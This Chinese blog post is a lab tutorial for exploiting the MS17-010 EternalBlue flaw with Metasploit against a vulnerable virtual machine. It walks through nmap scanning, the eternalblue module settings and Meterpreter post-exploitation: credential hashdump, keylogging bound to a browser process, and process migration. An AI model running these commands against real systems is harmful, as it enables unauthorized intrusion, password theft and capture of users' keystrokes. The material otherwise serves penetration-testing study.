[内网渗透]---msf基础-永恒之蓝-ms17-010

what

Metasploit(通常简称为MSF)是一个开源的渗透测试框架,包含大量的已知漏洞利用模块,可以用来攻击目标系统并获取控制权。

how

实验环境:Kali、带有永恒之蓝漏洞的虚拟机且开启445端口(两个虚拟机同一子网)

1.信息收集

1.1查找Kali同一网段内的存活主机namp -sP 网段

namp--script-vlnu 网段


1.2检验目标主机是否有漏洞以及端口开放情况

查看漏洞&开放端口:nmap --script vuln ip

2

msfconsole 是 Metasploit 框架的交互式命令行界面,也是 Metasploit 框架最常用的用户界面之一。通过 msfconsole,用户可以访问和使用 Metasploit 提供的各种功能和模块,包括漏洞利用(exploits)、有效载荷(payloads)、辅助模块(auxiliary modules)、编码器(encoders)和后期利用(post-exploitation)模块等。

2.1

msfconsole

2.2 

search <利用漏洞代号> ---查询msf是否有该漏洞能利用

use 0 ----使用第一个利用漏洞机制进入该模块 --自动进入--》

msf6 exploit(windows/smb/ms17_010_eternalblue) >  模块

show options ---查看参数


ps:这里的源IP以及默认填上了Kali IP 其他参数默认不用改 只需要填写目的ip(漏洞主机IP)

set rhost 目标IP

3

所有参数配置完毕 利用的模块启动 --->run/exploit

Meterpreter 是 Metasploit 框架中一个非常强大的后渗透工具,不但完全getshell同时本身也有很多功能去进一步利用目标主机

ps:Linux与Windows间的字符编码会不统一,会出现乱码

解决乱码问题---chcp 65001

多提一嘴msf框架的关系图类比Linux---gpt告诉我的

      Metasploit 框架(msf6)                     Linux 操作系统
      +-------------------+                     +-------------------+
    1  | 渗透测试平台       |                     | 操作系统           |
      +-------------------+                     +-------------------+
                 |                                       |
                 v                                       v
      利用模块(exploit module)                 可执行程序或脚本
      +-------------------------------+         +-------------------------------+
     2 | 特定漏洞利用代码               |         | 运行在系统上的程序或脚本       |
      +-------------------------------+         +-------------------------------+
                 |                                       |
                 v                                       v
      Meterpreter                                    Shell/终端会话
      +---------------------------+               +---------------------------+
    3  | 高级后渗透测试工具        |               | 系统交互界面               |
      +---------------------------+               +---------------------------+
2--->3 run/exploit

3--->2 background  

并且框架内是有会话概念的,msf不单单可以管理一个会话 可以use切换

4 后渗透模块自带的功能

run windows/gather/smart_hashdump---收集用户名密码


ps ---查看被攻击主机当前运行进程

将键盘记录与浏览器进程相绑定--------------

keyscan_start:开启键盘记录功能

keyscan_dump:显示捕捉到的键盘记录信息

keyscan_stop:停止键盘记录功能

migrate id ---进程迁移

getpid--- 查看我们当前的进程id

keyscan_dump:显示捕捉到的键盘记录信息

还有好多用法大家可以参考这个🔗
MSF使用详解-安全客 - 安全资讯平台 (anquanke.com)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值